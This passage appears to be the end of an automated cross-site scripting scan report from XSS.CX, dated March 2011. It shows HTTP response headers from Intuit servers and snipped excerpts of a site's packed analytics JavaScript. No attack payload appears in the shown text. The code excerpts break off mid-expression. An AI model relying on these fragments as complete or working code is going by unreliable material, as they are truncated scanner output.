/* ACCOUNT */ // Check if this is defined, otherwise default to the common SBE account if (scAccount.length > 0) { s_account = scAccount; } else { s_account = "intuitsbe"; } s = s_gi(s_acco ...[SNIP]... `i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p" +"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo" +"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd= ...[SNIP]...
HTTP/1.1 404 Not Found
Date: Mon, 21 Mar 2011 16:21:27 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 3585
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>Error 404: Page Not Found</title> <link href="/css/wcgErrorPgs.css" re ...[SNIP]...
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:26 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: application/javascript
Content-Length: 27792
/* ACCOUNT */ // Check if this is defined, otherwise default to the common SBE account if (scAccount.length > 0) { s_account = scAccount; } else { s_account = "intuitsbe"; } s = s_gi(s_acco ...[SNIP]...
Report generated by XSS.CX at Mon Mar 21 14:59:37 CDT 2011.